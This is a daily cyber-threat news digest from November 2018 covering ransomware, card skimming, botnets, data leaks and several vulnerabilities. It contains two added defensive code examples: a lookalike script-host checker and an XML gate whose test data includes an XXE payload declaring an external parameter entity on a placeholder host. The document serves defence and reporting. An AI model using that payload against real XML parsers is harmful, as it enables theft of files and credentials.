Silobreaker Daily Cyber Digest – 05 November 2018
ESC Corporate Services targeted by ransomware
- Toronto-based ESC Corporate Services, a licensed government provider of access to government records and government registration and filing services, has been hit by a ransomware attack. The attack was first detected on October 25th, 2018.
- The data affected includes corporation records, names, addresses, and registration of liens for automobile, boat and equipment leases.
New ransomware discovered installing DiskCryptor
- The ransomware installs DiskCryptor and reboots the computer. Victims are then sent a ransom note that states that their disk is being encrypted and how they can pay the ransom. DiskCryptor encrypts the whole disk and then prompts the user to enter a password on reboot.
- MalwareHunterTeam has observed that the ransomware is being run manually or is being called by another script, because it requires an argument to be passed to the program, which is used as the password for DiskCryptor. There is also a possibility that the threat actors are breaking into exposed Remote Desktop Services and installing the ransomware manually.
F-Secure observes new spam campaign targeting Mac users that use Exodus
- The spam email contains an attachment called ‘Exodus-MacOS-1.64.1-update[.]zip’ that attempts to deliver a fake Exodus update using the subject line ‘Update 1.64.1 Release – New Assets and more’.
- The attached archive leads to an application that contains a Mach-O binary with the filename ‘rtcfg’. Analysis of the strings showed references to the ‘relatime-spy-mac[.]com’ website, which provides a cloud-based surveillance and remote spy tool. The spy tool supports Windows as well as Mac.
Trinity and FBot botnets competing for control over unsecured Android devices
- The Trinity and FBot botnets are in direct competition for control over unsecured Android devices. In particular, devices with an exposed diagnostic port 5555 are affected. The port hosts a standard Android feature called Android Debug Bridge (ADB).
- The Trinity botnet uses the access to plant a cryptominer onto the affected device. The purpose of the FBot botnet remains unknown; however, FBot was found to contain special code designed to search for Trinity’s file names and remove them.
Hacker groups increasingly use log file destruction to hide their attacks
- Carbon Black released a report on 113 investigations its incident response partners had performed detailing how cyber attacks carried out by nation-state actors were increasingly destroying log data, antivirus logs, and security logs in order to make it more difficult for Incident Response teams to access and investigate data.
Security researcher analyses compromised e-commerce websites
- Researcher Brian Krebs has released an in-depth analysis of compromised websites and the methods attackers use to place tiny snippets of malicious code that invoke hostile domains onto the targeted sites.
- Krebs provides an example of card-skimming code being placed on asianfoodgrocer[.]com, hosted on the zoobashop[.]com domain. Zoobashop was discovered to be a currently hacked e-commerce site based in Ghana that serves a tiny obfuscated script named js[.]js, stealing data submitted into online forms.
- Other examples include setting up malicious domains that mimic the original host domain; for example, bargainjunkie[.]com was mimicked by barganljunkie[.]com.
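As an added example (not from Krebs’s analysis or the original digest), a defender-side check that walks a page’s script sources, skips the site’s own relative paths, and flags external hosts that are either unknown or lookalikes of the site’s own domain, the pattern described above. The shop domain, the allowlist and the HTML are constructed; the lookalike mirrors the bargainjunkie/barganljunkie substitution.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page for a fictional shop: its own JS, a known CDN, an unknown
# tracker, and a tiny 'js.js' loaded from a lookalike of the shop's own domain.
SITE = "bargainjunkie.example"
ALLOWED_HOSTS = {SITE, "cdn.jquery.example"}
SAMPLE_HTML = """<html><head>
<script src="/static/cart.js"></script>
<script src="https://cdn.jquery.example/jquery.min.js"></script>
<script src="https://stats.tracker.example/t.js"></script>
<script src="https://barganljunkie.example/js.js"></script></head></html>"""

_CONFUSABLES = str.maketrans({"l": "i", "1": "i", "0": "o", "5": "s", "3": "e"})  # glyphs that read alike

def _levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

class _ScriptSources(HTMLParser):
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.sources.append(src)

def classify_script_hosts(html: str, site: str, allowed: set) -> dict:
    """Map each external script host to 'allowed', 'lookalike' or 'unknown'."""
    parser = _ScriptSources()
    parser.feed(html)
    verdicts = {}
    for src in parser.sources:
        host = urlparse(src).hostname
        if host is None:  # relative path, served by the site itself
            continue
        if host in allowed:
            verdicts[host] = "allowed"
        elif 0 < _levenshtein(host.translate(_CONFUSABLES), site.translate(_CONFUSABLES)) <= 2:
            verdicts[host] = "lookalike"  # within two folded edits of our own domain
        else:
            verdicts[host] = "unknown"
    return verdicts
```

Run against a saved copy of a checkout page on a schedule and alert on any verdict other than "allowed"; a skimmer that appears between two runs shows up as a new host.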
Leaks and Breaches
Magecart malware steals Kitronik’s customers’ data
- The website of Kitronik, an educational electronics provider, has been compromised by the Magecart malware. According to the company, the malware was present on their website between August and September 2018.
- The data breached includes customer names, emails, card numbers, card expiry dates, CVVs and postal addresses. A company spokesman has stated that customers who set up their account prior to August 2018 are unlikely to have been affected.
- It is unclear how many individuals were affected by the breach.
Hackers steal documents on French nuclear power plants and prisons
- German and French media reported that hackers stole over 11,000 sensitive files pertaining to high-security prison video camera locations, a planned nuclear-waste dump, and to a thousand employees of the French firm Ingerop.
Data leak of Moscow internet provider Akado Telecom affects thousands of wealthy residents
- Customers’ personal data including names, home addresses and mobile phone numbers were exposed on an international not-for-profit internet registry database.
- Reuters observed the exposed personal data of prominent Russian individuals including a government official, a film director and a businessman.
New Microsoft Edge browser zero-day remote code execution exploit discovered
- Researchers announced on Twitter on Wednesday that they had compromised Microsoft Edge, with proof in the form of an image that displayed the web browser appearing to launch the Windows Calculator app.
- Researchers Yushi Liang and Alexander Kochkov are working on developing a stable exploit and achieving a full sandbox escape. They were also looking for a method to escalate execution privileges to SYSTEM to gain full control of the machine.
New PortSmash side-channel vulnerability discovered
- PortSmash uses a timing attack to steal information from other processes running on the same CPU core with SMT/hyperthreading enabled. Researchers testing this attack were able to steal the private decryption key from an OpenSSL thread running on the same core as their exploit.
- The PortSmash vulnerability was discovered by researchers from the Tampere University of Technology in Finland and the Universidad Tecnologica de la Habana in Cuba. Their research is presented in the paper ‘Port Contention for Fun and Profit’.
Serious vulnerability found in CASE Suite software
- Researcher Gjoko Krstic discovered a high severity vulnerability, tracked as CVE-2018-17912, in the building automation software CASE Suite sold by Swiss-based FR. Sauter AG. The flaw affects CASE Suite versions 3.10 and earlier.
- The vulnerability is an XML external entity (XXE) bug ‘using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via [an] out-of-band (OOB) attack’.
- An attacker can exploit the vulnerability to steal files from the compromised device, including configuration data, personal information, account credentials and details about the system and the network housing it. The flaw has since been patched.
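As an added example (not from the advisory or from Sauter), a pre-parse gate that refuses untrusted XML carrying any DTD construct, including the external parameter entities the CASE Suite finding refers to, before it reaches a parser. It works on the raw text so it does not depend on a given XML library’s entity-resolution defaults; the two documents and the DTD URL are constructed placeholders and nothing is fetched.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples. The hostile one declares an external parameter entity
# (the DTD feature named in the CASE Suite advisory); the URL is a placeholder.
BENIGN_XML = '<?xml version="1.0"?><config><node id="1">ok</node></config>'
HOSTILE_XML = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE config ['
    '<!ENTITY % ext SYSTEM "http://placeholder.example/ext.dtd"> %ext;'
    ']><config><node id="1">&leak;</node></config>'
)

# Matched on the raw text and biased towards rejection: a configuration file
# from a building controller has no business carrying a DOCTYPE at all.
_CHECKS = (
    ("doctype",          re.compile(r"<!DOCTYPE", re.I)),
    ("parameter_entity", re.compile(r"<!ENTITY\s+%", re.I)),
    ("external_id",      re.compile(r"<!(?:ENTITY|DOCTYPE)[^>]*\b(?:SYSTEM|PUBLIC)\b", re.I)),
)

def dtd_findings(xml_text: str) -> list:
    """Names of the DTD constructs present in the document (empty means clean)."""
    return [name for name, rx in _CHECKS if rx.search(xml_text)]

def parse_untrusted_xml(xml_text: str) -> ET.Element:
    """Parse only DTD-free documents; refuse everything else loudly.

    Keeping the gate independent of parser settings means a later change of
    XML library, or a library default that quietly resolves entities, cannot
    reintroduce external entity resolution on this code path.
    """
    findings = dtd_findings(xml_text)
    if findings:
        raise ValueError("rejected untrusted XML: " + ", ".join(findings))
    return ET.fromstring(xml_text)

if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN_XML).find("node").text)
    try:
        parse_untrusted_xml(HOSTILE_XML)
    except ValueError as exc:
        print(exc)
```

Pair the gate with the parser’s own hardening (disable DTD loading and external entities wherever the library exposes the switch) and log every rejection: a stream of rejected DOCTYPEs against a service that never needs them is itself a useful detection signal.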
Research from University of California suggests ‘sniffing’ attacks can reveal browser history
- Modern browsers such as Chrome, Firefox and Edge have vulnerabilities that allow malicious websites to extract thousands of URLs in a user’s web history. The vulnerabilities are reportedly built into the way these browsers structure links, which means that major structural changes would have to take place to fix them.
- Tor was the only browser immune to these attacks, due to it not keeping track of a user’s internet history.
- Lead researcher Michael Smith stated that fixes would take several months to a year to implement.
Domain name provider EasyDNS admits to accidentally leaking contact details
- The leak affected 1,500 domain owners in Whois query results for just over 24 hours. The records include names, phone numbers, email addresses and postal addresses, which should have remained private in Whois searches.
- The information was reportedly exposed by a bug in the system that was provided by Tucows, which is used by EasyDNS in its backend to manage domain names. On October 25th Tucows deployed some new components that contained the software bug.
News apps and apps for children found to contain the largest number of third-party trackers
- Researchers from the University of Oxford studied nearly one million Android apps on the UK and US Google Play Store and found that 90% of them contain at least one third-party tracker. Their findings also reveal that news apps and apps aimed at children in particular contain the highest numbers of trackers.
Brian Kemp’s office launches investigation into alleged hacking attempt by Democratic Party
- Secretary of State Brian Kemp’s office has stated that they will be investigating the Democratic Party in relation to an alleged attempt to hack Georgia’s online voter database.
- The alleged hacking altered voters’ information or removed them from the registered voter list altogether. So far, no evidence has been provided in support of the claim.
Former CIA employee reportedly leaked national defense materials from prison
- Joshua Adam Schulte was originally arrested for leaking information on the CIA’s hacking tools to WikiLeaks, which he stole in 2016 while working for the CIA. Federal prosecutors recently issued another indictment against Schulte, claiming he attempted to keep leaking information from prison, including classified information and search warrant materials.
Twitter deletes 10,000 bot accounts discouraging people from voting in US midterms
- Twitter deleted the accounts, which falsely appeared to be run by the Democratic Party. The Democratic Congressional Campaign Committee campaigned to get the fraudulent accounts deleted as part of its response to bots spreading fake and negative information about the 2016 Democratic presidential candidate Hillary Clinton.
Ransomware bundles sold on dark web for cut prices
- SamSam ransomware is reportedly included in a bundle of 23 ransomware families, alongside other variants such as Magniber, Satan, CryBrazil and XiaoBa. The bundle was discovered by security firm Sixgill on sale for $750 and also includes tutorials and instructions on how to use the ransomware and how to exploit vulnerabilities such as EternalBlue.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.